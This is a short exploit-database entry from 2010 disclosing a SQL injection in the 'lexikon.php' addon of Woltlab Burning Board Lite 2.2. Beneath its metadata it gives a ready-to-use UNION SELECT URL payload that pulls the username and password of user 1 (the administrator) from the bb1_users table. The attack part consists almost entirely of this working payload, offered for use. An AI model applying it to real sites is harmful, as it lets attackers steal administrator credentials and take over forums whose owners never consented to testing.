EXPLOITS

Woltlab Burning Board Lite Addon - 'lexikon.php' SQL Injection

Author: n3w7u
type: webapps
platform: php
port: 
date_added: 2010-03-20  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 11829.txt  

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

 ~ Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability  ~

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

[+] Autor: n3w7u

[+] Vulnerabilities [ SQL Injection ]

[+] Page: http://www.mywbb.info/board/thread.php?threadid=125185

[+] Language: [ PHP ]

[+] Version: 2.2

[+] Date: 21.03.2010


.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

    lexikon.php?action=show&id=


[+] Exploitable

    http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1--